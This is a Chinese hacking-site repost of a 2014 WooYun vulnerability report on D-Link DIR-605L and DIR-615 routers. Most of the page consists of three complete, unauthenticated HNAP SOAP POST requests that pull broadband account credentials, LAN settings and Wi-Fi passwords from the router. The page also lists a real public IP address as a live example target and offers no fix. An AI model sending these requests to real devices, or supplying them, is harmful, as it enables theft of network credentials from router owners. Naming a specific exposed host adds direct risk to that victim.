记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

D-Link两款路由发送特定POST包获取宽带帐号wifi等密码

2014-09-30 04:35

固件版本 : 1.12

硬件版本 : Ax

型号 : DIR-605L

添加:型号 DIR-615同样受影响。



获取宽带帐号等信息

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 331

SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"

Host: 地址:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">

</GetWanSettings>

</soap:Body>

</soap:Envelope>





获取路由内网地址信息

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 343

SOAPAction: "http://purenetworks.com/HNAP1/GetRouterLanSettings"

Host: 地址:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetRouterLanSettings xmlns="http://purenetworks.com/HNAP1/">

</GetRouterLanSettings>

</soap:Body>

</soap:Envelope>





获取wifi密码等信息

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 380

SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"

Host: 地址:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/">

<RadioID>2.4GHZ</RadioID>

</GetWLanRadioSecurity>

</soap:Body>

</soap:Envelope>





案例:http://27.45.196.132:8080/

漏洞证明:

1.jpg





2.jpg





3.jpg

修复方案:

。。

知识来源: www.wooyun.org/bugs/wooyun-2014-066906

阅读:200696 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“D-Link两款路由发送特定POST包获取宽带帐号wifi等密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云